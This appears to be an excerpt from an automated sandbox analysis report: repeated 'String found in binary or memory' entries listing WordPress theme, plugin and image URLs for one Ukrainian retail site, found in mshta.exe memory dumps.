Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/js/front.js?v
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png)
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-size:
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png)g
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/minus.svg
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/plus.svg
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.jquery.js?ver=1
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=1.3
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/front.js?ver=1.3.4.2
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/checkbox.js?ver=1.
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/mselect.js?ver=1.3
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=1.3.4
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=1.3.
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/css/ion.rang
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.range
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/plugins/tooltipst
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/tooltipster.bundl
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bundle
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5.6
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/password-strength-meter.min.j
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.6.2
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?v
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-w
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.57
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5;
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5?ver=2.3.73.8
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5C:
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5mart
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5C:
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5N
Source: mshta.exe, 00000003.00000002.2953230766.0000018407710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5b
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5e.css?ver=2.3.7
Source: mshta.exe, 00000003.00000002.2953230766.0000018407788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5ooQp
Source: mshta.exe, 00000003.00000002.2953230766.0000018407788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5un.r
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.17.5)
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5)
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);css
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.57KJd
Source: mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.17.5#fl-icons)
Source: mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.17.5)
Source: mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.17.5)
Source: mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.17.5)
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.17.5
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.17.57
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.17.5W
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.17.5
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.17.5.5
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.17.5S
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.17.5
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.17.5O
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/flatsome.js?ver=89ac940c4841291ea8d6
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=1a392523165907adee6a
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=1a392523165907adee6aR
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/libs/infinite-scroll.pkgd.min.js?ver=4.0.1
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/inc/extensions/flatsome-infinite-scroll/flatsome-inf
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/inc/extensions/flatsome-instant-page/flatsome-instan
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/inc/extensions/flatsome-lazy-load/flatsome-lazy-load
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-se
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/cropped-logo-d-270x270.jpg
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/cropped-logo-d-270x270.jpg/
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-180x180.jpg.pagespeed.ic.5J2kHsZjY5.jpg
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-180x180.jpg.pagespeed.ic.5J2kHsZjY5.jpg/
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.j
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.jpg.pagespeed.ic.EwuWeIzKab.jpg
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.js
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.js?ve
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-32x32.jpg.pagespeed.ic.O2d9531Kcm.jpg
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xdohovir-oferty-280x280.png.pagespeed.ic.Us1ysJgC5g.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xdopomoha-280x280.png.pagespeed.ic.YLuKJA07kn.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xlogo-gurt-m.png.pagespeed.ic.SkQgjUt9Ci.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xostanni-zamovlennia-280x280.png.pagespeed.ic.y9zgyMzY4v.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xprofil-280x280.png.pagespeed.ic.A1jMtoXaMR.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xvidnovyty-parol-280x280.png.pagespeed.ic.FKw07L82hi.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xzamovlennia-280x280.png.pagespeed.ic.nWjuhwsWVe.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xznyzhky-280x280.png.pagespeed.ic.aW61iAx-0t.png
Source: mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=12
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1DSC:
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1F
